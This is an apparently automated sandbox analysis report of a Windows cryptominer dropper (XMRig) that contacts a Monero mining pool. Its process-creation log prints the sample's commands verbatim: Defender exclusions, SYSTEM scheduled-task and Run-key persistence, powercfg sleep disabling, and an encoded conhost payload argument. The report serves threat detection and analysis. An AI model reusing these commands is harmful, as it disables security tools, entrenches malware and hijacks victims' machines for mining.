Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTr
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7716, ProcessName: powershell.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-04T19:39:35.160404+010020229301A Network Trojan was detected20.12.23.50443192.168.2.749782TCP
                        2024-11-04T19:40:15.342501+010020229301A Network Trojan was detected4.175.87.197443192.168.2.749924TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: ahlntQUj2t.exeAvira: detected
                        Source: C:\Windows\Temp\tkfgvduf.tmpAvira: detection malicious, Label: HEUR/AGEN.1313087
                        Source: C:\Program Files\xjfgcnhmcvxy.exeAvira: detection malicious, Label: TR/Crypt.EPACK.Gen2
                        Source: C:\Program Files\xjfgcnhmcvxy.exeReversingLabs: Detection: 50%
                        Source: C:\Windows\Temp\tkfgvduf.tmpReversingLabs: Detection: 62%
                        Source: ahlntQUj2t.exeReversingLabs: Detection: 50%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Windows\Temp\tkfgvduf.tmpJoe Sandbox ML: detected
                        Source: C:\Program Files\xjfgcnhmcvxy.exeJoe Sandbox ML: detected
                        Source: ahlntQUj2t.exeJoe Sandbox ML: detected

                        Bitcoin Miner

                        barindex
                        Source: Yara matchFile source: 16.2.xjfgcnhmcvxy.exe.7ff72348c320.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.xjfgcnhmcvxy.exe.7ff72348fc00.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.xjfgcnhmcvxy.exe.7ff72347d500.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.xjfgcnhmcvxy.exe.7ff723470000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.xjfgcnhmcvxy.exe.7ff72348fc00.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.2615840139.000002B9B4427000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.2615840139.000002B9B44C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.2615840139.000002B9B43E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 8180, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Windows\Temp\tkfgvduf.tmp, type: DROPPED
                        Source: unknownDNS query: name: xmr-eu1.nanopool.org
                        Source: tkfgvduf.tmp.16.drString found in binary or memory: FileDescriptionXMRig miner.
                        Source: C:\Program Files\xjfgcnhmcvxy.exeDirectory created: C:\Program Files\Google\LibsJump to behavior
                        Source: C:\Windows\System32\cmd.exeDirectory created: C:\Program Files\Google\Libs\g.log
                        Source: ahlntQUj2t.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WR64.sys.16.dr
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeCode function: 4x nop then push rbx0_2_00007FF624AC55C8
                        Source: C:\Program Files\xjfgcnhmcvxy.exeCode function: 4x nop then push rbx16_2_00007FF7234755C8
                        Source: C:\Windows\System32\conhost.exeCode function: 4x nop then push rbx28_2_00007FF6B1A246F3
                        Source: global trafficTCP traffic: 192.168.2.7:49855 -> 54.37.232.103:10343
                        Source: Joe Sandbox ViewIP Address: 54.37.232.103 54.37.232.103
                        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49782
                        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49924
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: time.windows.com
                        Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
                        Source: conhost.exe, 00000022.00000002.2616177696.000002B9B49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
                        Source: conhost.exe, 00000022.00000002.2616177696.000002B9B49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crlXd
                        Source: WR64.sys.16.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                        Source: WR64.sys.16.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                        Source: WR64.sys.16.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                        Source: WR64.sys.16.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                        Source: powershell.exe, 00000007.00000002.1442724674.0000026CF7DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1565918785.000001EF3B1FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1468881092.000001EF2CB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1565918785.000001EF3B336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1669199935.0000027098B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000022.00000002.2616177696.000002B9B49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
                        Source: powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000007.00000002.1423008816.0000026CE7F58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000007.00000002.1423008816.0000026CE7D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1468881092.000001EF2B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.0000027088B05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000007.00000002.1423008816.0000026CE7F58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000D.00000002.1468881092.000001EF2C78E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000007.00000002.1423008816.0000026CE7D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1468881092.000001EF2B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.0000027088B05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.000002708A9A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 00000007.00000002.1423008816.0000026CE9BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1423008816.0000026CE9BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.000002708A97F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.000002708A9A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                        Source: powershell.exe, 00000015.00000002.1669199935.0000027098B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000015.00000002.1669199935.0000027098B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000015.00000002.1669199935.0000027098B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 0000000D.00000002.1468881092.000001EF2C2F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000007.00000002.1442724674.0000026CF7DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1565918785.000001EF3B1FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1468881092.000001EF2CB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1565918785.000001EF3B336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1669199935.0000027098B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 0000000D.00000002.1468881092.000001EF2C78E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 0000000D.00000002.1468881092.000001EF2C78E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

                        System Summary

                        barindex
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeCode function: 0_2_00007FF624AC4B40 NtCreateUserProcess,0_2_00007FF624AC4B40
                        Source: C:\Program Files\xjfgcnhmcvxy.exeCode function: 16_2_00007FF723474B40 NtWriteFile,16_2_00007FF723474B40
                        Source: C:\Windows\System32\conhost.exeCode function: 28_2_00007FF6B1A23C70 NtReadFile,28_2_00007FF6B1A23C70
                        Source: C:\Program Files\xjfgcnhmcvxy.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeFile deleted: C:\Windows\Temp\tkfgvduf.tmpJump to behavior
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeCode function: 0_2_00007FF624AC2D400_2_00007FF624AC2D40
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeCode function: 0_2_00007FF624AC8DF00_2_00007FF624AC8DF0
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeCode function: 0_2_00007FF624AC36500_2_00007FF624AC3650
                        Source: C:\Program Files\xjfgcnhmcvxy.exeCode function: 16_2_00007FF72347365016_2_00007FF723473650
                        Source: C:\Program Files\xjfgcnhmcvxy.exeCode function: 16_2_00007FF723472D4016_2_00007FF723472D40
                        Source: C:\Program Files\xjfgcnhmcvxy.exeCode function: 16_2_00007FF723478DF016_2_00007FF723478DF0
                        Source: C:\Windows\System32\conhost.exeCode function: 28_2_00007FF6B1A222E028_2_00007FF6B1A222E0
                        Source: C:\Windows\System32\conhost.exeCode function: 28_2_00007FF6B1A22BF028_2_00007FF6B1A22BF0
                        Source: C:\Windows\System32\conhost.exeCode function: 28_2_00007FF6B1A2156028_2_00007FF6B1A21560
                        Source: C:\Windows\System32\conhost.exeCode function: 28_2_00007FF6B1A27F2028_2_00007FF6B1A27F20
                        Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                        Source: xjfgcnhmcvxy.exe.0.drStatic PE information: Number of sections : 11 > 10
                        Source: ahlntQUj2t.exeStatic PE information: Number of sections : 11 > 10
                        Source: WR64.sys.16.drBinary string: \Device\WinRing0_1_2_0
                        Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@53/24@2/1
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeFile created: C:\Program Files\xjfgcnhmcvxy.exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7696:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2044:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:972:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Global\gzssianthtxzdggz
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3792:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8132:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdikchqo.reh.ps1Jump to behavior
                        Source: ahlntQUj2t.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: ahlntQUj2t.exeReversingLabs: Detection: 50%
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeFile read: C:\Users\user\Desktop\ahlntQUj2t.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\ahlntQUj2t.exe "C:\Users\user\Desktop\ahlntQUj2t.exe"
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydxtfs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GQFENPEL" } Else { "C:\Program Files\xjfgcnhmcvxy.exe" }
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GQFENPEL
                        Source: unknownProcess created: C:\Program Files\xjfgcnhmcvxy.exe "C:\Program Files\xjfgcnhmcvxy.exe"
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe xcgkmjxjdowq
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Name, VideoProcessor
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe gzssianthtxzdggz 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvug8Rp3hiani4Twfqfj5pfOQ4C5/lIR+WrKX/39lFBfrYgVA5xlELaQrgfEYI/1+l+sm6d1wY+jp8lQ+gyInBZtRryf27JkgwVg8+gc8zt/+Qw/FqR21gXGsiWp5M1/PaUO8B8L/yFa9vhQOOMQzU9osOZwr+lVWCnvU0S6ajO3l3PA+IO3tZ+KIHzg9oJDykmRT9FPoLVpg3f2E+S/d4wYAneGaTBaw9u+h7ySSQW4uLa2RdrQlsNvaothGQq4OkU9/7weTT4gwdlFYcJqzkf6CrPgHCU2Z2X/1LqnGA0Z/oGM3RQZ3KFMH6aI6u72Mx/Roo9xz5ogo8pI2aMP1z57eBCyYbXyiGT0rCG540iwNf53KRDw5r+qu9TX7DnABrUnuCbtJtyaOErrfhHdH0mzc3oHhwbzk+xXdFEnj5LezfN80ibSpckaUWKu/Nc8n5n3862TFcZoV3+5pG7wnvACa9eswJk6IY7ANEpRFN9HJzRPurRT3aTK7NgnMwc4gmU=
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
